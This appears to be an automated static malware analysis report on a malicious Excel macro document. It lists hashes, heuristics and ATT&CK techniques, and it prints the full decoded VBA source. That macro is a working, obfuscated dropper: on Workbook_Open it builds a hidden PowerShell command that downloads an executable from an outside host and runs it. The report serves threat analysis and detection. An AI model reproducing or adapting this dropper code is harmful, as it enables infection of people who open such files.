Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 080f0bfedd2aff14…

MALICIOUS

Office (OLE)

54.0 KB Created: 2017-10-19 07:59:05 Authoring application: Microsoft Excel First seen: 2019-04-18
MD5: fe3732a27182aedb0b08e849687ce49f SHA-1: a37bb6d5b83fb810a82c2f305289375a77a18e45 SHA-256: 080f0bfedd2aff146ce14f8d9b781638b1253fda5cff44670ebbc65f6bc0e5e1
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

The critical heuristic 'OLE_VBA_SHELL' indicates a Shell() call within the VBA macros. The Workbook_Open macro is present, suggesting execution upon opening the Excel file. The reconstructed command `cmDwShE Ll -n oPRoFi -WIn HiDden -nOnInT erA -ExEcuTI byP ss " /c"` likely downloads and executes a second-stage payload, a common dropper behavior.

Heuristics 4

  • ClamAV: Xls.Dropper.Generic-6595971-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Generic-6595971-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2926 bytes
SHA-256: 23ffbd056e9b2af3bce48ac499e28177b3e9cfa15b7b70d892e84672688e2416
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True







Function patalofiid()

sifuyoda = "ss','a" + "rt','-Pr'" + ") $D"
tabacooppiim = "whi"
patalofiid = tabacooppiim + "le(!" + "${?});" + "&(\""{0" + "}{2" + "}{3}{1}\""-f 'St'" + ",'o" + "ce" + sifuyoda + "es\"
End Function



Function stupiida()
nizergoob = "{D`es} =  $7d"
stupiida = "do{" + "&(" + "\""{1" + "}{0}\"" -f'e" + "p'," + "'sl" + "e') 3" + "3;$" + nizergoob
End Function

Function portoshipper()
If msoBlogMultipleCategories > 0 Then
listercorvin = Array(Minute(Now), Second(Now), "oP" + "RoFi -W", Now(), Second(Now))
izusesphone = Array(Minute(Now), Second(Now), "Er", Minute(Now))



sekemakol = Array(Second(Now), Minute(Now), "nONinT", Now())
opergrouper = "a"
nalmaclever = Array(Second(Now), Minute(Now), "Ecu" + "TI", Minute(Now), Minute(Now))

adeliacoler = Array(Second(Now), "d" + "en -n", Minute(Now))
zyziopera = Array(Second(Now), opergrouper + "ss    """, Second(Now), Minute(Now), "d  " + " /c""", Minute(Now))
portoshipper = "c" + "m" + zyziopera(4) + "p" + "Ow" + izusesphone(2) + "ShE" + "Ll -n" + listercorvin(2) + "In  HiD" + adeliacoler(1) + "oLo -" + sekemakol(2) + "erA  -Ex" + nalmaclever(2) + "OnP byP" + zyziopera(1)
End If
End Function

Function hintermulls()
kodakpictured = "vIr'" + ",'N" + "t','mE') ;  "
hintermulls = "$7d" + "0mK6 = [Ty" + "PE" + "](\""{1}{0" + "}{3}{2}\"" -f 'on'," + "'eN" + kodakpictured
End Function
Sub Workbook_Open()
pomologos = "p"
If msoAlertCancelThird > 0.09 Then
Dim agorofodo As String

Randomize
agorofodo = Int(Rnd * 9882761#)
fimmenos = agorofodo
berlinootto = stupiida + "0mk" + "6:" + ":g" + "Et" + "foL" + "deRp" + "ATh(\""De" + "sktop" + "\"");(&(\""{" + "0}{1" + "}{2}\"" -f'N" + "e','w-'" + ",'Ob" + "je" + "ct') "

nishspace = bissmarus + ".Ne','ent','t.Web','ClI')).dOwNLOaDfiLE.INVokE(\""ht" + "t" + "p://mo" + "merton.c" + "om/a" + "tsms\"",\""$D" + "es\" + fimmenos + ".e" + "xe\"")}"
quttrowheels = patalofiid + fimmenos + ".ex" + "e"""
xedosmaza = hintermulls + berlinootto + nishspace + quttrowheels
hubabbuba = portoshipper + xedosmaza
zalkaoreos = msoAnimationLookDown - 104
Shell hubabbuba, zalkaoreos
End If
End Sub

Function bissmarus()
bissmarus = "(\""{0}" + "{2}{1}{3}{" + "5}{6}" + "{4}\""-f'" + "Sy'" + ",'te','s','m"
End Function









Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True